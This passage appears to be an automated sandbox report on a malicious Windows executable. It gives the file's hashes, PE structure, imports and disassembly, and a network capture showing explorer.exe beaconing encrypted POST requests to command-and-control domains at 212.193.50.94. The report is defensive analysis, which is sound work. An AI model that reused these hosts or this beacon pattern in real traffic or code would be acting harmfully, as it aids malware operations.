            • Antivirus: ReversingLabs, Detection: 48%
            Reputation:low
            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........R...R...R...=.2.{...=...B...=.3.1...[...U...R.......=.6.S...=...S...=...S...RichR...................PE..L....._.....................Z.......|....... ....@.............................................................................P.......0g...........................................................z..@...............x............................text...>........................... ..`.data........ ...b..................@....rsrc...0g.......h...j..............@..@.reloc..@...........................@..B........................................................................................................................................................................................................................................................................................................................................................................
            C:\Users\user\AppData\Roaming\iaivaah:Zone.Identifier
            Process:C:\Windows\explorer.exe
            File Type:ASCII text, with CRLF line terminators
            Category:modified
            Size (bytes):26
            Entropy (8bit):3.95006375643621
            Encrypted:false
            SSDEEP:3:ggPYV:rPYV
            MD5:187F488E27DB4AF347237FE461A079AD
            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
            Malicious:true
            Reputation:high, very likely benign file
            Preview: [ZoneTransfer]....ZoneId=0

            Static File Info

            General

            File type:PE32 executable (GUI) Intel 80386, for MS Windows
            Entropy (8bit):5.571504370703933
            TrID:
            • Win32 Executable (generic) a (10002005/4) 99.96%
            • Generic Win/DOS Executable (2004/3) 0.02%
            • DOS Executable Generic (2002/1) 0.02%
            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
            File name:cf71PGrIPQ.exe
            File size:321024
            MD5:19b07bfa4ba4cffba03dff47a9efdf36
            SHA1:0629443d410c7ef3cdec3528c257022f4700d062
            SHA256:79c00db1607b8f07618ee3f90f5c4e160c7de05bce6380a7de83171e2eac11d4
            SHA512:38ba5ce878e41a4c52ab3e4f9a1399de227e21ab11a94de1f57640e6c5f3b6263a875f7c9f208640638c233e5084ab80f48d466203b598a466d437f6be5e53d4
            SSDEEP:6144:bJhiMLzKtF+5t5CPqTTfMNqSXuZet0ygwcAzvzEgV2Lo:l93FQPqTTfSqSXuZet0ygwcKEgQL
            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........R...R...R...=.2.{...=...B...=.3.1...[...U...R.......=.6.S...=...S...=...S...RichR...................PE..L......_...........

            File Icon

            Icon Hash:c8d0d8e0f8e8f4e8

            Static PE Info

            General

            Entrypoint:0x417c90
            Entrypoint Section:.text
            Digitally signed:false
            Imagebase:0x400000
            Subsystem:windows gui
            Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
            DLL Characteristics:TERMINAL_SERVER_AWARE
            Time Stamp:0x5FC7ADE7 [Wed Dec 2 15:08:23 2020 UTC]
            TLS Callbacks:
            CLR (.Net) Version:
            OS Version Major:5
            OS Version Minor:1
            File Version Major:5
            File Version Minor:1
            Subsystem Version Major:5
            Subsystem Version Minor:1
            Import Hash:e8c238b864f7b42d074feea3c8efffa3
            Instruction
            mov edi, edi
            push ebp
            mov ebp, esp
            call 00007FA8CC360A2Bh
            call 00007FA8CC360736h
            pop ebp
            ret
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            mov edi, edi
            push ebp
            mov ebp, esp
            push FFFFFFFEh
            push 0042F830h
            push 0041BEB0h
            mov eax, dword ptr fs:[00000000h]
            push eax
            add esp, FFFFFF98h
            push ebx
            push esi
            push edi
            mov eax, dword ptr [00432064h]
            xor dword ptr [ebp-08h], eax
            xor eax, ebp
            push eax
            lea eax, dword ptr [ebp-10h]
            mov dword ptr fs:[00000000h], eax
            mov dword ptr [ebp-18h], esp
            mov dword ptr [ebp-70h], 00000000h
            lea eax, dword ptr [ebp-60h]
            push eax
            call dword ptr [004012D4h]
            cmp dword ptr [0320F9DCh], 00000000h
            jne 00007FA8CC360730h
            push 00000000h
            push 00000000h
            push 00000001h
            push 00000000h
            call dword ptr [00401244h]
            call 00007FA8CC3608B3h
            mov dword ptr [ebp-6Ch], eax
            call 00007FA8CC36487Bh
            test eax, eax
            jne 00007FA8CC36072Ch
            push 0000001Ch
            call 00007FA8CC360870h
            add esp, 04h
            call 00007FA8CC3641D8h
            test eax, eax
            jne 00007FA8CC36072Ch
            push 00000010h
            call 00007FA8CC36085Dh
            add esp, 04h
            push 00000001h
            call 00007FA8CC364123h
            add esp, 04h
            call 00007FA8CC361DDBh
            mov dword ptr [ebp-04h], 00000000h
            call 00007FA8CC3619BFh
            test eax, eax
            Programming Language:
            • [LNK] VS2010 build 30319
            • [ASM] VS2010 build 30319
            • [ C ] VS2010 build 30319
            • [C++] VS2010 build 30319
            • [RES] VS2010 build 30319
            • [IMP] VS2008 SP1 build 30729
            NameVirtual AddressVirtual Size Is in Section
            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_IMPORT0x2fe140x50.text
            IMAGE_DIRECTORY_ENTRY_RESOURCE0x2e110000x6730.rsrc
            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
            IMAGE_DIRECTORY_ENTRY_BASERELOC0x2e180000x17c8.reloc
            IMAGE_DIRECTORY_ENTRY_DEBUG0x13c00x1c.text
            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x17ac80x40.text
            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_IAT0x10000x378.text
            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

            Sections

            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
            .text0x10000x3033e0x30400False0.608160621762data7.03134441107IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            .data0x320000x2dde9e00x6200unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
            .rsrc0x2e110000x67300x6800False0.569899338942data5.59196486771IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .reloc0x2e180000x113400x11400False0.0750537817029data0.977464876IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
            NameRVASizeTypeLanguageCountry
            RT_ICON0x2e112400xea8dataSpanishPanama
            RT_ICON0x2e120e80x6c8dataSpanishPanama
            RT_ICON0x2e127b00x568GLS_BINARY_LSB_FIRSTSpanishPanama
            RT_ICON0x2e12d180x25a8dataSpanishPanama
            RT_ICON0x2e152c00x10a8dataSpanishPanama
            RT_ICON0x2e163680x988dBase III DBT, version number 0, next free block index 40SpanishPanama
            RT_ICON0x2e16cf00x468GLS_BINARY_LSB_FIRSTSpanishPanama
            RT_STRING0x2e171c00x314dataDivehi; Dhivehi; MaldivianMaldives
            RT_STRING0x2e174d80x254dataDivehi; Dhivehi; MaldivianMaldives
            RT_GROUP_ICON0x2e171580x68dataSpanishPanama
            DLLImport
            KERNEL32.dllLocalUnlock, GetThreadContext, GetPrivateProfileSectionNamesW, EnumResourceNamesW, SetCriticalSectionSpinCount, GlobalMemoryStatus, FindResourceA, lstrcmpA, FindFirstFileW, EnumCalendarInfoA, WriteConsoleInputW, IsBadStringPtrW, EnumDateFormatsExW, CopyFileExW, GetStringTypeA, UnmapViewOfFile, MoveFileExA, GetNumberOfConsoleInputEvents, GetConsoleAliasExesLengthA, BuildCommDCBAndTimeoutsA, SetUnhandledExceptionFilter, LoadLibraryExW, GetQueuedCompletionStatus, MoveFileExW, InterlockedDecrement, GetCurrentProcess, SetDefaultCommConfigW, SetEnvironmentVariableW, GlobalLock, GetComputerNameW, SetEvent, SetThreadExecutionState, OpenSemaphoreA, CreateHardLinkA, GetFileAttributesExA, FreeEnvironmentStringsA, _lclose, GetModuleHandleW, GetCommConfig, GetProcessHeap, IsBadReadPtr, GetSystemTimeAsFileTime, GetNumberFormatA, GetPrivateProfileStringW, GetConsoleTitleA, GetCompressedFileSizeW, ReadConsoleOutputA, WaitNamedPipeW, EnumTimeFormatsA, SetCommState, GetSystemWow64DirectoryA, TzSpecificLocalTimeToSystemTime, WaitForMultipleObjectsEx, GetProcessTimes, TlsSetValue, AllocateUserPhysicalPages, FindResourceExA, GlobalAlloc, GetConsoleMode, FatalAppExitW, GetThreadSelectorEntry, CopyFileW, GetPrivateProfileStructW, GetCalendarInfoW, ReadFileScatter, SetSystemTimeAdjustment, SetVolumeMountPointA, GetSystemWindowsDirectoryA, SetConsoleCP, DeleteVolumeMountPointW, LeaveCriticalSection, GetFileAttributesA, lstrcpynW, SetDllDirectoryA, SetConsoleMode, HeapValidate, GetVolumePathNamesForVolumeNameW, CreateSemaphoreA, SetConsoleCursorPosition, WritePrivateProfileSectionW, TerminateProcess, IsDBCSLeadByte, GetModuleFileNameW, CreateActCtxA, lstrcatA, GetBinaryTypeW, CompareStringW, lstrlenW, GetFullPathNameA, GlobalUnlock, VirtualUnlock, CreateJobObjectA, GetNamedPipeHandleStateW, EnumSystemLocalesA, GetPrivateProfileIntW, VerifyVersionInfoW, InterlockedExchange, GetStdHandle, FindFirstFileA, GetLastError, ChangeTimerQueueTimer, SetLastError, ReadConsoleOutputCharacterA, GetProcAddress, GetLongPathNameA, HeapSize, PeekConsoleInputW, BackupWrite, VerLanguageNameA, SetFirmwareEnvironmentVariableW, CreateNamedPipeA, EnumDateFormatsExA, CreateJobSet, EnterCriticalSection, SearchPathA, BuildCommDCBW, DefineDosDeviceA, GetNumaHighestNodeNumber, FindClose, GetPrivateProfileStringA, GetAtomNameA, LoadLibraryA, Process32FirstW, OpenMutexA, ProcessIdToSessionId, GetExitCodeThread, SetCurrentDirectoryW, SetFileApisToANSI, QueryDosDeviceW, PostQueuedCompletionStatus, HeapWalk, GetPrivateProfileStructA, SetNamedPipeHandleState, GetModuleFileNameA, GetDefaultCommConfigA, WriteProfileStringA, EnumDateFormatsA, WaitCommEvent, SetConsoleTitleW, FindFirstChangeNotificationA, GetProcessShutdownParameters, QueueUserWorkItem, ContinueDebugEvent, HeapSetInformation, IsDebuggerPresent, FreeEnvironmentStringsW, FindNextFileW, WriteProfileStringW, VirtualProtect, GetConsoleCursorInfo, WriteConsoleOutputAttribute, OutputDebugStringA, DuplicateHandle, GetVersionExA, TlsAlloc, TerminateJobObject, CloseHandle, GetVersion, FindFirstVolumeW, DeleteTimerQueueTimer, GlobalAddAtomW, SetFileValidData, GetTempPathA, FindActCtxSectionStringW, ResetWriteWatch, UnregisterWaitEx, InterlockedPushEntrySList, TlsFree, CopyFileExA, CommConfigDialogW, DeleteFileA, CreateThread, lstrcpyA, CreateFileW, SetStdHandle, RaiseException, WritePrivateProfileStringW, ExitProcess, GetCommandLineW, GetStartupInfoW, QueryPerformanceCounter, GetTickCount, GetCurrentThreadId, GetCurrentProcessId, InterlockedIncrement, DecodePointer, GetEnvironmentStringsW, SetHandleCount, InitializeCriticalSectionAndSpinCount, GetFileType, DeleteCriticalSection, EncodePointer, TlsGetValue, HeapCreate, WriteFile, GetACP, GetOEMCP, GetCPInfo, IsValidCodePage, LoadLibraryW, UnhandledExceptionFilter, HeapAlloc, HeapReAlloc, HeapQueryInformation, HeapFree, RtlUnwind, WideCharToMultiByte, LCMapStringW, MultiByteToWideChar, GetStringTypeW, WriteConsoleW, OutputDebugStringW, IsProcessorFeaturePresent, SetFilePointer, GetConsoleCP, FlushFileBuffers
            USER32.dllGetMessageTime, GetMenuItemID
            GDI32.dllGetBitmapBits

            Possible Origin

            Language of compilation systemCountry where language is spokenMap
            SpanishPanama
            Divehi; Dhivehi; MaldivianMaldives

            Network Behavior

            Download Network PCAP: filteredfull

            Network Port Distribution

            • Total Packets: 64
            • 80 (HTTP)
            • 53 (DNS)
            TimestampSource PortDest PortSource IPDest IP
            Nov 28, 2021 05:08:42.536529064 CET4974880192.168.2.3212.193.50.94
            Nov 28, 2021 05:08:43.547103882 CET8049748212.193.50.94192.168.2.3
            Nov 28, 2021 05:08:43.547327042 CET4974880192.168.2.3212.193.50.94
            Nov 28, 2021 05:08:43.547394991 CET4974880192.168.2.3212.193.50.94
            Nov 28, 2021 05:08:43.547419071 CET4974880192.168.2.3212.193.50.94
            Nov 28, 2021 05:08:45.242983103 CET4974880192.168.2.3212.193.50.94
            Nov 28, 2021 05:08:48.352559090 CET4974880192.168.2.3212.193.50.94
            Nov 28, 2021 05:08:54.353080034 CET4974880192.168.2.3212.193.50.94
            Nov 28, 2021 05:08:55.409656048 CET8049748212.193.50.94192.168.2.3
            Nov 28, 2021 05:08:59.934400082 CET8049748212.193.50.94192.168.2.3
            Nov 28, 2021 05:08:59.934556007 CET4974880192.168.2.3212.193.50.94
            Nov 28, 2021 05:08:59.934956074 CET4974880192.168.2.3212.193.50.94
            Nov 28, 2021 05:09:00.266998053 CET4978680192.168.2.3212.193.50.94
            Nov 28, 2021 05:09:01.200565100 CET8049786212.193.50.94192.168.2.3
            Nov 28, 2021 05:09:01.200721025 CET4978680192.168.2.3212.193.50.94
            Nov 28, 2021 05:09:01.200874090 CET4978680192.168.2.3212.193.50.94
            Nov 28, 2021 05:09:01.200949907 CET4978680192.168.2.3212.193.50.94
            Nov 28, 2021 05:09:02.791347980 CET4978680192.168.2.3212.193.50.94
            Nov 28, 2021 05:09:03.803189039 CET8049786212.193.50.94192.168.2.3
            Nov 28, 2021 05:09:22.417896986 CET4974880192.168.2.3212.193.50.94
            Nov 28, 2021 05:09:23.368499994 CET8049748212.193.50.94192.168.2.3
            Nov 28, 2021 05:09:28.165318012 CET8049786212.193.50.94192.168.2.3
            Nov 28, 2021 05:09:28.165467978 CET4978680192.168.2.3212.193.50.94
            Nov 28, 2021 05:09:28.166107893 CET4978680192.168.2.3212.193.50.94
            Nov 28, 2021 05:09:28.533108950 CET4981580192.168.2.3212.193.50.94
            Nov 28, 2021 05:09:29.424966097 CET8049815212.193.50.94192.168.2.3
            Nov 28, 2021 05:09:29.425081968 CET4981580192.168.2.3212.193.50.94
            Nov 28, 2021 05:09:29.425179005 CET4981580192.168.2.3212.193.50.94
            Nov 28, 2021 05:09:30.934284925 CET4981580192.168.2.3212.193.50.94
            Nov 28, 2021 05:09:30.950042009 CET4978680192.168.2.3212.193.50.94
            Nov 28, 2021 05:09:31.811788082 CET8049786212.193.50.94192.168.2.3
            Nov 28, 2021 05:09:31.835429907 CET8049815212.193.50.94192.168.2.3
            Nov 28, 2021 05:09:35.751183987 CET8049815212.193.50.94192.168.2.3
            Nov 28, 2021 05:09:35.794058084 CET4981580192.168.2.3212.193.50.94
            Nov 28, 2021 05:09:36.520987988 CET8049815212.193.50.94192.168.2.3
            Nov 28, 2021 05:09:36.575315952 CET4981580192.168.2.3212.193.50.94
            Nov 28, 2021 05:09:36.604118109 CET8049815212.193.50.94192.168.2.3
            Nov 28, 2021 05:09:36.653521061 CET4981580192.168.2.3212.193.50.94
            Nov 28, 2021 05:09:38.370796919 CET8049815212.193.50.94192.168.2.3
            Nov 28, 2021 05:09:38.370870113 CET8049815212.193.50.94192.168.2.3
            Nov 28, 2021 05:09:38.370980024 CET4981580192.168.2.3212.193.50.94
            Nov 28, 2021 05:09:39.234653950 CET8049815212.193.50.94192.168.2.3
            Nov 28, 2021 05:09:39.278717995 CET4981580192.168.2.3212.193.50.94
            Nov 28, 2021 05:09:39.312383890 CET8049815212.193.50.94192.168.2.3
            Nov 28, 2021 05:09:39.356854916 CET4981580192.168.2.3212.193.50.94
            Nov 28, 2021 05:09:40.843255043 CET8049815212.193.50.94192.168.2.3
            Nov 28, 2021 05:09:40.843288898 CET8049815212.193.50.94192.168.2.3
            Nov 28, 2021 05:09:40.843357086 CET4981580192.168.2.3212.193.50.94
            Nov 28, 2021 05:09:41.578494072 CET8049815212.193.50.94192.168.2.3
            Nov 28, 2021 05:09:41.622860909 CET4981580192.168.2.3212.193.50.94
            Nov 28, 2021 05:09:41.625014067 CET8049815212.193.50.94192.168.2.3
            Nov 28, 2021 05:09:41.669616938 CET4981580192.168.2.3212.193.50.94
            Nov 28, 2021 05:09:42.331737995 CET8049815212.193.50.94192.168.2.3
            Nov 28, 2021 05:09:42.331796885 CET8049815212.193.50.94192.168.2.3
            Nov 28, 2021 05:09:42.331990957 CET4981580192.168.2.3212.193.50.94
            Nov 28, 2021 05:09:42.471694946 CET8049815212.193.50.94192.168.2.3
            Nov 28, 2021 05:09:42.513607979 CET4981580192.168.2.3212.193.50.94
            Nov 28, 2021 05:09:43.902610064 CET8049815212.193.50.94192.168.2.3
            Nov 28, 2021 05:09:43.902643919 CET8049815212.193.50.94192.168.2.3
            Nov 28, 2021 05:09:43.902754068 CET4981580192.168.2.3212.193.50.94
            Nov 28, 2021 05:09:44.582878113 CET8049815212.193.50.94192.168.2.3
            Nov 28, 2021 05:09:44.638704062 CET4981580192.168.2.3212.193.50.94
            Nov 28, 2021 05:09:44.664314032 CET8049815212.193.50.94192.168.2.3
            Nov 28, 2021 05:09:44.716639042 CET4981580192.168.2.3212.193.50.94
            Nov 28, 2021 05:09:46.202285051 CET8049815212.193.50.94192.168.2.3
            Nov 28, 2021 05:09:46.202351093 CET8049815212.193.50.94192.168.2.3
            Nov 28, 2021 05:09:46.202405930 CET4981580192.168.2.3212.193.50.94
            Nov 28, 2021 05:09:47.045120955 CET8049815212.193.50.94192.168.2.3
            Nov 28, 2021 05:09:47.091988087 CET4981580192.168.2.3212.193.50.94
            Nov 28, 2021 05:09:47.217637062 CET8049815212.193.50.94192.168.2.3
            Nov 28, 2021 05:09:47.263920069 CET4981580192.168.2.3212.193.50.94
            Nov 28, 2021 05:09:50.230729103 CET8049815212.193.50.94192.168.2.3
            Nov 28, 2021 05:09:50.279841900 CET4981580192.168.2.3212.193.50.94
            Nov 28, 2021 05:09:51.017038107 CET8049815212.193.50.94192.168.2.3
            Nov 28, 2021 05:09:51.060935974 CET4981580192.168.2.3212.193.50.94
            Nov 28, 2021 05:09:51.149533033 CET8049815212.193.50.94192.168.2.3
            Nov 28, 2021 05:09:51.201718092 CET4981580192.168.2.3212.193.50.94
            Nov 28, 2021 05:09:52.871088028 CET8049815212.193.50.94192.168.2.3
            Nov 28, 2021 05:09:52.871154070 CET8049815212.193.50.94192.168.2.3
            Nov 28, 2021 05:09:52.871340990 CET4981580192.168.2.3212.193.50.94
            Nov 28, 2021 05:09:53.811266899 CET8049815212.193.50.94192.168.2.3
            Nov 28, 2021 05:09:53.858213902 CET4981580192.168.2.3212.193.50.94
            Nov 28, 2021 05:09:53.874634981 CET8049815212.193.50.94192.168.2.3
            Nov 28, 2021 05:09:53.920933962 CET4981580192.168.2.3212.193.50.94
            Nov 28, 2021 05:09:55.597835064 CET8049815212.193.50.94192.168.2.3
            Nov 28, 2021 05:09:55.597898960 CET8049815212.193.50.94192.168.2.3
            Nov 28, 2021 05:09:55.597963095 CET4981580192.168.2.3212.193.50.94
            Nov 28, 2021 05:09:56.522470951 CET8049815212.193.50.94192.168.2.3
            Nov 28, 2021 05:09:56.577119112 CET4981580192.168.2.3212.193.50.94
            Nov 28, 2021 05:09:57.185074091 CET8049815212.193.50.94192.168.2.3
            Nov 28, 2021 05:09:57.233443975 CET4981580192.168.2.3212.193.50.94
            Nov 28, 2021 05:09:58.574994087 CET8049815212.193.50.94192.168.2.3
            Nov 28, 2021 05:09:58.575053930 CET8049815212.193.50.94192.168.2.3
            Nov 28, 2021 05:09:58.575126886 CET4981580192.168.2.3212.193.50.94
            Nov 28, 2021 05:09:59.470108986 CET8049815212.193.50.94192.168.2.3
            Nov 28, 2021 05:09:59.514997005 CET4981580192.168.2.3212.193.50.94
            Nov 28, 2021 05:09:59.564305067 CET8049815212.193.50.94192.168.2.3
            Nov 28, 2021 05:09:59.608613014 CET4981580192.168.2.3212.193.50.94
            Nov 28, 2021 05:10:01.292143106 CET8049815212.193.50.94192.168.2.3
            Nov 28, 2021 05:10:01.292206049 CET8049815212.193.50.94192.168.2.3
            Nov 28, 2021 05:10:01.292388916 CET4981580192.168.2.3212.193.50.94
            Nov 28, 2021 05:10:02.236233950 CET8049815212.193.50.94192.168.2.3
            Nov 28, 2021 05:10:02.281039000 CET4981580192.168.2.3212.193.50.94
            Nov 28, 2021 05:10:02.297687054 CET8049815212.193.50.94192.168.2.3
            Nov 28, 2021 05:10:02.343324900 CET4981580192.168.2.3212.193.50.94
            Nov 28, 2021 05:10:04.037050009 CET8049815212.193.50.94192.168.2.3
            Nov 28, 2021 05:10:04.037106037 CET8049815212.193.50.94192.168.2.3
            Nov 28, 2021 05:10:04.037220001 CET4981580192.168.2.3212.193.50.94
            Nov 28, 2021 05:10:04.982840061 CET8049815212.193.50.94192.168.2.3
            Nov 28, 2021 05:10:05.029218912 CET8049815212.193.50.94192.168.2.3
            Nov 28, 2021 05:10:05.030822992 CET4981580192.168.2.3212.193.50.94
            Nov 28, 2021 05:10:05.077680111 CET4981580192.168.2.3212.193.50.94
            Nov 28, 2021 05:10:06.795540094 CET8049815212.193.50.94192.168.2.3
            Nov 28, 2021 05:10:06.795594931 CET8049815212.193.50.94192.168.2.3
            Nov 28, 2021 05:10:06.795759916 CET4981580192.168.2.3212.193.50.94
            Nov 28, 2021 05:10:07.579317093 CET8049815212.193.50.94192.168.2.3
            Nov 28, 2021 05:10:07.624779940 CET4981580192.168.2.3212.193.50.94
            Nov 28, 2021 05:10:08.010468960 CET8049815212.193.50.94192.168.2.3
            Nov 28, 2021 05:10:08.062391996 CET4981580192.168.2.3212.193.50.94
            Nov 28, 2021 05:10:08.716598034 CET8049815212.193.50.94192.168.2.3
            Nov 28, 2021 05:10:08.765753984 CET4981580192.168.2.3212.193.50.94
            TimestampSource PortDest PortSource IPDest IP
            Nov 28, 2021 05:08:42.510080099 CET5391053192.168.2.38.8.8.8
            Nov 28, 2021 05:08:42.530241966 CET53539108.8.8.8192.168.2.3
            Nov 28, 2021 05:08:59.950397968 CET4955953192.168.2.38.8.8.8
            Nov 28, 2021 05:09:00.266118050 CET53495598.8.8.8192.168.2.3
            Nov 28, 2021 05:09:28.239465952 CET6329753192.168.2.38.8.8.8
            Nov 28, 2021 05:09:28.532522917 CET53632978.8.8.8192.168.2.3

            DNS Queries

            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
            Nov 28, 2021 05:08:42.510080099 CET192.168.2.38.8.8.80x7de4Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
            Nov 28, 2021 05:08:59.950397968 CET192.168.2.38.8.8.80x1b0fStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
            Nov 28, 2021 05:09:28.239465952 CET192.168.2.38.8.8.80x3e0bStandard query (0)privacytoolzforyou-7000.comA (IP address)IN (0x0001)

            DNS Answers

            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
            Nov 28, 2021 05:08:42.530241966 CET8.8.8.8192.168.2.30x7de4No error (0)host-data-coin-11.com212.193.50.94A (IP address)IN (0x0001)
            Nov 28, 2021 05:09:00.266118050 CET8.8.8.8192.168.2.30x1b0fNo error (0)host-data-coin-11.com212.193.50.94A (IP address)IN (0x0001)
            Nov 28, 2021 05:09:28.532522917 CET8.8.8.8192.168.2.30x3e0bNo error (0)privacytoolzforyou-7000.com212.193.50.94A (IP address)IN (0x0001)

            HTTP Request Dependency Graph

            • cyknc.net
              • host-data-coin-11.com
            • sremv.net
            • privacytoolzforyou-7000.com

            HTTP Packets

            Session IDSource IPSource PortDestination IPDestination PortProcess
            0192.168.2.349748212.193.50.9480C:\Windows\explorer.exe
            TimestampkBytes transferredDirectionData
            Nov 28, 2021 05:08:43.547394991 CET1145OUTPOST / HTTP/1.1
            Connection: Keep-Alive
            Content-Type: application/x-www-form-urlencoded
            Accept: */*
            Referer: http://cyknc.net/
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
            Content-Length: 233
            Host: host-data-coin-11.com
            Nov 28, 2021 05:08:43.547419071 CET1145OUTData Raw: 10 87 82 91 1a f5 dc c7 cc 36 0c 41 7d c8 ec 89 4a 14 df 32 a5 44 1a 98 bd ec ad 84 89 a0 92 f6 11 b2 55 d5 19 1a cb e4 ee a8 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 45 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 59 d8 89 69
            Data Ascii: 6A}J2DUwmEu$f]dYi#^u,_o}){pH~*_w.n^!TP!P/iqt,M+Y4!Hn[v>CY#]_~:VyA:@(1e[?'d-1
            Nov 28, 2021 05:08:45.242983103 CET1146OUTPOST / HTTP/1.1
            Connection: Keep-Alive
            Content-Type: application/x-www-form-urlencoded
            Accept: */*
            Referer: http://cyknc.net/
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
            Content-Length: 233
            Host: host-data-coin-11.com
            Data Raw: 10 87 82 91 1a f5 dc c7 cc 36 0c 41 7d c8 ec 89 4a 14 df 32 a5 44 1a 98 bd ec ad 84 89 a0 92 f6 11 b2 55 d5 19 1a cb e4 ee a8 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 45 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 59 d8 89 69 23 c8 5e 75 ca 2c 0b 5f 6f 7d b3 99 d1 29 b3 cc 85 af 01 7b 03 1b 70 c5 48 7f f6 7e 2a 5f 77 9d 2e f4 86 6e a9 5e 21 54 50 e9 9b 21 01 50 af 2f f6 c3 69 71 cc aa 74 d9 12 2c 4d d5 2b da 59 f5 80 84 ac dc 34 d2 21 8e 14 48 0a 6e 5b e5 76 89 da 3e ff 8c 15 c2 c3 0c 43 1d 9c b6 dc e7 91 12 59 a1 ee 81 c2 9b 23 5d cb a8 d9 f0 5f 7e 3a 56 17 a0 ae 79 1b 41 c1 81 bd 3a 9a 40 28 31 f6 16 65 aa bc 5b f7 01 b5 3f e6 e3 19 27 d6 64 82 b0 d5 2d 97 da 7f 31 81
            Data Ascii: 6A}J2DUwmEu$f]dYi#^u,_o}){pH~*_w.n^!TP!P/iqt,M+Y4!Hn[v>CY#]_~:VyA:@(1e[?'d-1
            Nov 28, 2021 05:08:48.352559090 CET1273OUTPOST / HTTP/1.1
            Connection: Keep-Alive
            Content-Type: application/x-www-form-urlencoded
            Accept: */*
            Referer: http://cyknc.net/
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
            Content-Length: 233
            Host: host-data-coin-11.com
            Data Raw: 10 87 82 91 1a f5 dc c7 cc 36 0c 41 7d c8 ec 89 4a 14 df 32 a5 44 1a 98 bd ec ad 84 89 a0 92 f6 11 b2 55 d5 19 1a cb e4 ee a8 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 45 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 59 d8 89 69 23 c8 5e 75 ca 2c 0b 5f 6f 7d b3 99 d1 29 b3 cc 85 af 01 7b 03 1b 70 c5 48 7f f6 7e 2a 5f 77 9d 2e f4 86 6e a9 5e 21 54 50 e9 9b 21 01 50 af 2f f6 c3 69 71 cc aa 74 d9 12 2c 4d d5 2b da 59 f5 80 84 ac dc 34 d2 21 8e 14 48 0a 6e 5b e5 76 89 da 3e ff 8c 15 c2 c3 0c 43 1d 9c b6 dc e7 91 12 59 a1 ee 81 c2 9b 23 5d cb a8 d9 f0 5f 7e 3a 56 17 a0 ae 79 1b 41 c1 81 bd 3a 9a 40 28 31 f6 16 65 aa bc 5b f7 01 b5 3f e6 e3 19 27 d6 64 82 b0 d5 2d 97 da 7f 31 81
            Data Ascii: 6A}J2DUwmEu$f]dYi#^u,_o}){pH~*_w.n^!TP!P/iqt,M+Y4!Hn[v>CY#]_~:VyA:@(1e[?'d-1
            Nov 28, 2021 05:08:54.353080034 CET1894OUTPOST / HTTP/1.1
            Connection: Keep-Alive
            Content-Type: application/x-www-form-urlencoded
            Accept: */*
            Referer: http://cyknc.net/
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
            Content-Length: 233
            Host: host-data-coin-11.com
